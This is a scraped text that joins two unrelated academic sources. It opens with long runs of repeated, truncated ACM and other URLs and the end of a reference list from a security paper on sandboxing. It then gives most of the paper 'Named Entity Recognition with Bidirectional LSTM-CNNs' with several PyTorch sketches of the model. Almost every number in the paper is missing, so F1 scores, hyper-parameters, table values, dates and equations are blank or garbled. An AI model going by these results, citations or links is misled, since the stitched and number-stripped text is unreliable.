http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? http://www.informationweek.com/mobile/mobile-devices/ces- -vmware-shows-android-based-virtual-machines/d/d-id/ ? 
http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . 
http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . /peerj-cs. rosenberg d. . poking holes in apparmor profiles. available at http://blog.azimuthsecurity. com/ / /poking-holes-in-apparmor-profiles.html (accessed april ). saxena p, molnar d, livshits b. . scriptgard: automatic context-sensitive sanitization for large-scale legacy web applications. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . schneider fb. . towards fault-tolerant and secure agentry. in: international workshop on distributed algorithms (wdag ’ ). london: springer-verlag, – . available at http://dl.acm. org/citation.cfm?id= . . schreier m. . qualitative content analysis in practice. st edition. thousand oaks: sage publications ltd. schreuders zc, mcgill t, payne c. . the state of the art of application restrictions and sandboxes: a survey of application-oriented access controls and their shortfalls. computers & security : – doi . /j.cose. . . . sehr d, muth r, biffle c, khimenko v, pasko e, schimpf k, yee b, chen b. . adapting software fault isolation to contemporary cpu architectures. 
in: usenix security (usenix security’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm? id= . . seshadri a, luk m, qu n, perrig a. . secvisor: a tiny hypervisor to provide lifetime kernel code integrity for commodity oses. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . siefers j, tan g, morrisett g. . robusta: taming the native beast of the jvm. in: acm conference on computer and communications security (ccs) (ccs ’ ). new york: acm, – . spearman c. . the proof and measurement of association between two things. american journal of psychology : – . stuckman j, purtilo j. . mining security vulnerabilities from linux distribution metadata. in: software reliability engineering workshops (issrew). washington, dc: ieee, – . sun w, sekar r, poothia g, karandikar t. . practical proactive integrity preservation: a basis for malware defense. in: ieee symposium on security and privacy (sp’ ). washington, dc: ieee computer society, – . szekeres l, payer m, wei t, song d. . eternal war in memory. in: ieee symposium on security and privacy (sp ’ ). washington, dc: ieee computer society, – . tang j. . exploring control flow guard in windows . available at http://blog.trendmicro. com/trendlabs-security-intelligence/exploring-control-flow-guard-in-windows- / (accessed september ). tang s, mai h, king st. . trust and protection in the illinois browser operating system. in: usenix symposium on operating systems design and implementation (osdi) (osdi’ ). berkeley: usenix association, – . available at http://dl.acm.org/citation.cfm?id= . . wahbe r, lucco s, anderson te, graham sl. . efficient software-based fault isolation. acm sigops operating systems review ( ): – doi . / . . wallach ds, balfanz d, dean d, felten ew. . extensible security architectures for java. in: symposium on operating systems principles (sosp ’ ). new york: acm, – . wang hj, fan x, howell j, jackson c. . protection and communication abstractions for web browsers in mashupos. in: acm symposium on operating systems principles (sosp) (sosp ’ ). new york: acm, – . maass et al. ( ), peerj comput. sci., doi . /peerj-cs. 
named entity recognition with bidirectional lstm-cnns

jason p.c. chiu, university of british columbia, jsonchiu@gmail.com
eric nichols, honda research institute japan co., ltd., e.nichols@jp.honda-ri.com

abstract

named entity recognition is a challenging task that has traditionally required large amounts of knowledge in the form of feature engineering and lexicons to achieve high performance.
in this paper, we present a novel neural network architecture that automatically detects word- and character-level features using a hybrid bidirectional lstm and cnn architecture, eliminating the need for most feature engineering. we also propose a novel method of encoding partial lexicon matches in neural networks and compare it to existing approaches. extensive evaluation shows that, given only tokenized text and publicly available word embeddings, our system is competitive on the conll- dataset and surpasses the previously reported state of the art performance on the ontonotes . dataset by . f points. by using two lexicons constructed from publicly-available sources, we establish new state of the art performance with an f score of . on conll- and . on ontonotes, surpassing systems that employ heavy feature engineering, proprietary lexicons, and rich entity linking information.

introduction

named entity recognition is an important task in nlp. high performance approaches have been dominated by applying crf, svm, or perceptron models to hand-crafted features (ratinov and roth, ; passos et al., ; luo et al., ). however, collobert et al. ( b) proposed an effective neural network model that requires little feature engineering and instead learns important features from word embeddings trained on large quantities of unlabelled text – an approach made possible by recent advancements in unsupervised learning of word embeddings on massive amounts of data (collobert and weston, ; mikolov et al., ) and neural network training algorithms permitting deep architectures (rumelhart et al., ).

unfortunately there are many limitations to the model proposed by collobert et al. ( b). first, it uses a simple feed-forward neural network, which restricts the use of context to a fixed sized window around each word – an approach that discards useful long-distance relations between words. second, by depending solely on word embeddings, it is unable to exploit explicit character level features such as prefix and suffix, which could be useful especially with rare words where word embeddings are poorly trained. we seek to address these issues by proposing a more powerful neural network model.

a well-studied solution for a neural network to process variable length input and have long term memory is the recurrent neural network (rnn) (goller and kuchler, ). recently, rnns have shown great success in diverse nlp tasks such as speech recognition (graves et al., ), machine translation (cho et al., ), and language modeling (mikolov et al., ). the long-short term memory (lstm) unit with the forget gate allows highly non-trivial long-distance dependencies to be easily learned (gers et al., ). for sequential labelling tasks such as ner and speech recognition, a bi-directional lstm model can take into account an effectively infinite amount of context on both sides of a word and eliminates the problem of limited context that applies to any feed-forward model (graves et al., ). while lstms have been studied in the past for the ner task by hammerton ( ), the lack of computational power (which led to the use
of very small models) and quality word embeddings limited their effectiveness.

figure : the (unrolled) blstm for tagging named entities, illustrated on the sentence "we saw paintings of picasso". multiple tables look up word-level feature vectors. the cnn (figure ) extracts a fixed length feature vector from character-level features. for each word, these vectors are concatenated and fed to the blstm network and then to the output layers (figure ).

convolutional neural networks (cnn) have also been investigated for modeling character-level information, among other nlp tasks. santos et al. ( ) and labeau et al. ( ) successfully employed cnns to extract character-level features for use in ner and pos-tagging respectively. collobert et al. ( b) also applied cnns to semantic role labeling, and variants of the architecture have been applied to parsing and other tasks requiring tree structures (blunsom et al., ). however, the effectiveness of character-level cnns has not been evaluated for english ner. while we considered using character-level bi-directional lstms, which was recently proposed by ling et al. ( ) for pos-tagging, preliminary evaluation shows that it does not perform significantly better than cnns while being more computationally expensive to train.

our main contribution lies in combining these neural network models for the ner task. we present a hybrid model of bi-directional lstms and cnns that learns both character- and word-level features, presenting the first evaluation of such an architecture on well-established english language evaluation datasets. furthermore, as lexicons are crucial to ner performance, we propose a new lexicon encoding scheme and matching algorithm that can make use of partial matches, and we compare it to the simpler approach of collobert et al. ( b). extensive evaluation shows that our proposed method establishes a new state of the art on both the conll- ner shared task and the ontonotes . datasets.

figure : the convolutional neural network extracts character features from each word (illustrated on the characters of "picasso", padded on both sides). the character embedding and (optionally) the character type feature vector are computed through lookup tables. then, they are concatenated and passed into the cnn.

model

our neural network is inspired by the work of collobert et al. ( b), where lookup tables transform discrete features such as words and characters into continuous vector representations, which are then concatenated and fed into a neural network. instead of a feed-forward network, we use the bi-directional long-short term memory (blstm) network. to induce character-level features, we use a convolutional neural network, which has been successfully applied to spanish and portuguese ner (santos et al., ) and german pos-tagging (labeau et al., ).

sequence-labelling with blstm

following the speech-recognition framework outlined by graves et al. ( ), we employed a stacked bi-directional recurrent neural network with long short-term memory units to transform word features into named entity tag scores.

figure : the output layers ("out" in figure ) decode output into a score for each tag category.
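to make the output-layer design of the figure above concrete, the following is a minimal sketch in pytorch (an assumed, illustrative framework choice; the authors' implementation uses the torch library and is not reproduced here): per-word feature vectors are passed through a forward and a backward lstm, each direction is decoded by a linear layer and a log-softmax layer, and the two log-probability vectors are added to give per-tag scores.

import torch
import torch.nn as nn
import torch.nn.functional as F

class BLSTMTagger(nn.Module):
    # per-word feature vectors -> forward/backward lstm -> linear + log-softmax
    # per direction -> element-wise sum of the two log-probability vectors
    def __init__(self, feat_dim, state_dim, num_tags, num_layers=1):
        super().__init__()
        self.fwd = nn.LSTM(feat_dim, state_dim, num_layers=num_layers, batch_first=True)
        self.bwd = nn.LSTM(feat_dim, state_dim, num_layers=num_layers, batch_first=True)
        self.fwd_out = nn.Linear(state_dim, num_tags)
        self.bwd_out = nn.Linear(state_dim, num_tags)

    def forward(self, feats):                      # feats: (batch, seq_len, feat_dim)
        h_fwd, _ = self.fwd(feats)                 # forward pass over the sentence
        h_bwd, _ = self.bwd(torch.flip(feats, [1]))
        h_bwd = torch.flip(h_bwd, [1])             # re-align backward outputs with token positions
        scores_fwd = F.log_softmax(self.fwd_out(h_fwd), dim=-1)
        scores_bwd = F.log_softmax(self.bwd_out(h_bwd), dim=-1)
        return scores_fwd + scores_bwd             # per-token, per-tag log-probability scores

the state size and the number of stacked lstm layers per direction are tuned hyper-parameters, as described in the following paragraphs.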
figures , , and illustrate the network in detail. the extracted features of each word are fed into a forward lstm network and a backward lstm network. the output of each network at each time step is decoded by a linear layer and a log-softmax layer into log-probabilities for each tag category. these two vectors are then simply added together to produce the final output. we tried minor variants of output layer architecture and selected the one that performed the best in preliminary experiments. for each direction (forward and backward), the input is fed into multiple layers of lstm units connected in sequence (i.e. lstm units in the second layer take in the output of the first layer, and so on); the number of layers is a tuned hyper-parameter. figure shows only one unit for simplicity.

extracting character features using a convolutional neural network

for each word we employ a convolution and a max layer to extract a new feature vector from the per-character feature vectors such as character embeddings (section . . ) and (optionally) character type (section . ). words are padded with a number of special padding characters on both sides depending on the window size of the cnn. the hyper-parameters of the cnn are the window size and the output vector size.

table : number of entries for each category (location, miscellaneous, organization, person, and total) in the senna lexicon and our dbpedia lexicon.

table : dataset sizes in number of tokens (entities) for the train, dev, and test splits of conll- and ontonotes . / conll- .

core features

word embeddings

our best model uses the publicly available -dimensional word embeddings released by collobert et al. ( b), which were trained on wikipedia and the reuters rcv- corpus. we also experimented with two other sets of published embeddings, namely stanford's glove embeddings trained on billion words from wikipedia and web text (pennington et al., ) and google's word2vec embeddings trained on billion words from google news (mikolov et al., ). in addition, as we hypothesized that word embeddings trained on in-domain text may perform better, we also used the publicly available glove (pennington et al., ) program and an in-house re-implementation of the word2vec (mikolov et al., ) program to train word embeddings on wikipedia and reuters rcv datasets as well. following collobert et al. ( b), all words are lower-cased before passing through the lookup table to convert to their corresponding embeddings.

(senna embeddings: http://ml.nec-labs.com/senna/; glove: http://nlp.stanford.edu/projects/glove/; word2vec: https://code.google.com/p/word2vec/.) we used our in-house reimplementation to train word vectors because it uses distributed processing to train much quicker than the publicly-released implementation of word2vec and its performance on the word analogy task was higher than reported by mikolov et al. ( ). while collobert et al. ( b) used wikipedia text from , we used wikipedia text from .
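as an illustration of the convolution-and-max character feature extraction described in the subsection above, here is a small pytorch sketch (again an assumed framework rather than the authors' code; the paper's explicit padding characters are approximated here by the convolution's padding argument): character embeddings for a word are stacked, a one-dimensional convolution is applied over the character positions, and a max layer produces a fixed-length vector whose size is the cnn output size.

import torch
import torch.nn as nn

class CharCNN(nn.Module):
    # characters -> embeddings -> 1d convolution over positions -> max pooling
    def __init__(self, num_chars, char_emb_dim, window, out_dim, pad_id=0):
        super().__init__()
        self.emb = nn.Embedding(num_chars, char_emb_dim, padding_idx=pad_id)
        # window (kernel size) and out_dim (output vector size) are the cnn hyper-parameters
        self.conv = nn.Conv1d(char_emb_dim, out_dim, kernel_size=window, padding=window // 2)

    def forward(self, char_ids):              # char_ids: (num_words, max_word_len)
        x = self.emb(char_ids)                # (num_words, max_word_len, char_emb_dim)
        x = self.conv(x.transpose(1, 2))      # (num_words, out_dim, num_positions)
        return x.max(dim=2).values            # max over positions -> (num_words, out_dim)

the optional character-type vector would simply be concatenated with the character embedding before the convolution, as in the figure caption above.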
the pre-trained embeddings are allowed to be modified during training. . . character embeddings we randomly initialized a lookup table with val- ues drawn from a uniform distribution with range [− . , . ] to output a character embedding of dimensions. the character set includes all unique characters in the conll- dataset plus the special tokens padding and unknown. the padding token is used for the cnn, and the unknown token is used for all other characters (which appear in ontonotes). the same set of ran- dom embeddings was used for all experiments. . additional word-level features . . capitalization feature as capitalization information is erased during lookup of the word embedding, we evaluate col- lobert’s method of using a separate lookup table to add a capitalization feature with the following op- tions: allcaps, upperinitial, lowercase, mixedcaps, noinfo (collobert et al., b). this method is compared with the character type feature (section . ) and character-level cnns. . . lexicons most state of the art ner systems make use of lexicons as a form of external knowledge (ratinov preliminary experiments showed that modifiable vectors performed better than so-called “frozen vectors.” upper and lower case letters, numbers, and punctuations we did not experiment with other settings because the en- glish character set is small enough that effective embeddings could be learned directly from the task data. by increments of . determined by evaluating dev set performance. probability of discarding any lstm output node. mini-batch size was excluded from the round particle swarm hyper-parameter search space due to time constraints. and roth, ; passos et al., ). for each of the four categories (person, organization, location, misc) defined by the conll ner shared task, we compiled a list of known named entities from dbpedia (auer et al., ), by extracting all descendants of db- pedia types corresponding to the conll cate- gories. we did not construct separate lexicons for the ontonotes tagset because correspondences be- tween dbpedia categories and its tags could not be found in many instances. in addition, for each entry we first removed parentheses and all text contained within, then stripped trailing punctuation, and fi- nally tokenized it with the penn treebank tokeniza- tion script for the purpose of partial matching. ta- ble shows the size of each category in our lexicon compared to collobert’s lexicon, which we extracted from their senna system. figure shows an example of how the lexicon features are applied. for each lexicon category, we match every n-gram (up to the length of the longest lexicon entry) against entries in the lexicon. a match is successful when the n-gram matches the prefix or suffix of an entry and is at least half the length of the entry. because of the high potential for spuri- ous matches, for all categories except person, we discard partial matches less than tokens in length. when there are multiple overlapping matches within the same category, we prefer exact matches over par- tial matches, and then longer matches over shorter matches, and finally earlier matches in the sentence over later matches. all matches are case insensitive. for each token in the match, the feature is en- the miscellaneous category was populated by entities of the dbpedia categories artifact and work. the punctuation stripped was period, comma, semi-colon, colon, forward slash, backward slash, and question mark. 
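a rough sketch of the partial-matching test described above is given below. the minimum token length for non-person partial matches is left as a parameter, since the exact value is elided in this excerpt, and the resolution of overlapping matches (exact over partial, longer over shorter, earlier over later) is omitted for brevity. matched tokens would then be tagged by their position within the entry, using the bioes encoding described next.

```python
# test whether a token n-gram matches a lexicon entry, as described above.
def match_type(ngram, entry, category, min_partial_tokens=2):   # threshold is a placeholder
    """return 'exact', 'partial', or None; all matching is case-insensitive."""
    ngram = [t.lower() for t in ngram]
    entry = [t.lower() for t in entry]
    if ngram == entry:
        return "exact"
    # a partial match must cover a prefix or suffix of the entry
    # and be at least half the length of the entry
    if 2 * len(ngram) < len(entry):
        return None
    if category != "PERSON" and len(ngram) < min_partial_tokens:
        return None
    if entry[:len(ngram)] == ngram or entry[-len(ngram):] == ngram:
        return "partial"
    return None
```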
as can been seen in this example, the lexicons – in partic- ular miscellaneous – still contain a lot of noise. hyper-parameter conll- (round ) ontonotes . (round ) final range final range convolution width [ , ] [ , ] cnn output size [ , ] [ , ] lstm state size [ , ] [ , ] lstm layers [ , ] [ , ] learning rate . [ − , − . ] . [ − . , − . ] epochs - - dropout . [ . , . ] . [ , ] mini-batch size - [ , ] table : hyper-parameter search space and final values used for all experiments round conll- ontonotes . . (± . ) . (± . ) . (± . ) . (± . ) table : development set f score performance of the best hyper-parameter settings in each optimization round. coded in bioes annotation (begin, inside, outside, end, single), indicating the position of the token in the matched entry. in other words, b will not appear in a suffix-only partial match, and e will not appear in a prefix-only partial match. as we will see in section . , we found that this more sophisticated method outperforms the method presented by collobert et al. ( b), which treats partial and exact matches equally, allows prefix but not suffix matches, allows very short partial matches, and marks tokens with yes/ no. in addition, since collobert et al. ( b) released their lexicon with their senna system, we also ap- plied their lexicon to our model for comparison and investigated using both lexicons simultaneously as distinct features. we found that the two lexicons complement each other and improve performance on the conll- dataset. our best model uses the senna lexicon with ex- act matching and our dbpedia lexicon with partial matching, with bioes annotation in both cases. . additional character-level features a lookup table was used to output a -dimensional vector representing the type of the character (upper case, lower case, punctuation, other). . training and inference . . implementation we implement the neural network using the torch library (collobert et al., a). training and inference are done on a per-sentence level. the ini- tial states of the lstm are zero vectors. except for the character and word embeddings whose initializa- tion has been described previously, all lookup tables are randomly initialized with values drawn from the standard normal distribution. . . objective function and inference we train our network to maximize the sentence- level log-likelihood from collobert et al. ( b). first, we define a tag-transition matrix a where ai,j represents the score of jumping from tag i to tag j in successive tokens, and a ,i as the score for starting with tag i. this matrix of parameters are also learned. define θ as the set of parameters for the neural network, and θ′ = θ ∪{ai,j ∀i,j} as the set of all parameters to be trained. given an exam- ple sentence, [x]t , of length t , and define [fθ]i,t as the score outputted by the neural network for the tth word and ith tag given parameters θ, then the score of a sequence of tags [i]t is given as the sum of net- work and transition scores: s([x]t , [i] t ,θ ′) = t∑ t= ( a[i]t− ,[i]t + [fθ][i]t,t ) much later, we discovered that training with cross entropy objective while performing viterbi decoding to restrict output to valid tag sequences also appears to work just as well. model conll- ontonotes . prec. recall f prec. recall f ffnn + emb + caps + lex . . . (± . ) . . . (± . ) blstm . . . (± . ) . . . (± . ) blstm-cnn . . . (± . ) . . . (± . ) blstm-cnn + emb . . . (± . ) . . . (± . ) blstm-cnn + emb + lex . . . (± . ) . . . (± . ) collobert et al. ( b) - - . - - - collobert et al. 
( b) + lexicon - - . - - - huang et al. ( ) - - . - - - ratinov and roth ( ) . . . . . . lin and wu ( ) - - . - - - finkel and manning ( ) - - - . . . suzuki et al. ( ) - - . - - - passos et al. ( ) - - . - - . durrett and klein ( ) - - - . . . luo et al. ( ) . . . - - - table : results of our models, with various feature sets, compared to other published results. the three sections are, in order, our models, published neural network models, and published non-neural network models. for the features, emb = collobert word embeddings, caps = capitalization feature, lex = lexicon features from both senna and dbpedia lexicons. for f scores, standard deviations are in parentheses. then, letting [y]t be the true tag sequence, the sentence-level log-likelihood is obtained by normal- izing the above score over all possible tag-sequences [j]t using a softmax: log p([y]t | [x]t ,θ′) = s([x]t , [y] t ,θ ′)− log ∑ ∀[j]t es([x] t ,[j] t ,θ ′) this objective function and its gradients can be ef- ficiently computed by dynamic programming (col- lobert et al., b). at inference time, given neural network out- puts [fθ]i,t we use the viterbi algorithm to find the tag sequence [i]t that maximizes the score s([x]t , [i] t ,θ ′). . . tagging scheme the output tags are annotated with bioes (which stand for begin, inside, outside, end, single, indicating the position of the token in the ontonotes results taken from (durrett and klein, ) evaluation on ontonotes . done by pradhan et al. ( ) not directly comparable as they evaluated on an earlier ver- sion of the corpus with a different data split. numbers taken from the original paper (luo et al., ). while the precision, recall, and f scores are clearly inconsis- tent, it is unclear in which way they are incorrect. entity) as this scheme has been reported to outper- form others such as bio (ratinov and roth, ). . . learning algorithm training is done by mini-batch stochastic gradi- ent descent (sgd) with a fixed learning rate. each mini-batch consists of multiple sentences with the same number of tokens. we found applying dropout to the output nodes of each lstm layer (pham et al., ) was quite effective in reducing overfit- ting (section . ). we explored other more sophis- ticated optimization algorithms such as momentum (nesterov, ), adadelta (zeiler, ), and rm- sprop (hinton et al., ), and in preliminary ex- periments they did not improve upon plain sgd. evaluation evaluation was performed on the well-established conll- ner shared task dataset (tjong kim sang and de meulder, ) and the much larger but less-studied ontonotes . dataset (hovy et al., ; pradhan et al., ). table gives an overview of these two different datasets. for each experiment, we report the average and standard deviation of successful trials. adding dropout to inputs seems to have an adverse effect. features blstm blstm-cnn blstm-cnn + lex conll ontonotes conll ontonotes conll ontonotes none . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) emb . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) . (± . ) emb + caps . (± . ) . (± . ) . (± . ) . (± . ) . (± . )* . (± . )* emb + caps + lex . (± . ) . (± . ) . (± . )* . (± . )* . (± . )* . (± . )* emb + char - - . (± . ) . (± . ) . (± . ) . (± . ) emb + char + caps - - . (± . ) . (± . ) . (± . ) . (± . ) table : f score results of blstm and blstm-cnn models with various additional features; emb = collobert word embeddings, char = character type feature, caps = capitalization feature, lex = lexicon features. 
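for concreteness, the viterbi inference described in the objective-function section above (finding the tag sequence that maximizes the sum of network scores and tag-transition scores) might be sketched as follows; here f holds the per-token tag scores output by the network, a the learned transition matrix, and a0 the start scores.

```python
# viterbi decoding over network scores and a learned tag-transition matrix (toy sketch).
import numpy as np

def viterbi_decode(f, A, A0):
    """f: (T, K) network scores; A: (K, K) transition scores; A0: (K,) start scores."""
    T, K = f.shape
    score = A0 + f[0]                       # best score for each tag at position 0
    back = np.zeros((T, K), dtype=int)
    for t in range(1, T):
        # cand[i, j]: best path ending in tag i at t-1, then jumping to tag j at t
        cand = score[:, None] + A + f[t][None, :]
        back[t] = cand.argmax(axis=0)
        score = cand.max(axis=0)
    tags = [int(score.argmax())]
    for t in range(T - 1, 0, -1):           # follow back-pointers
        tags.append(int(back[t][tags[-1]]))
    return tags[::-1]
```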
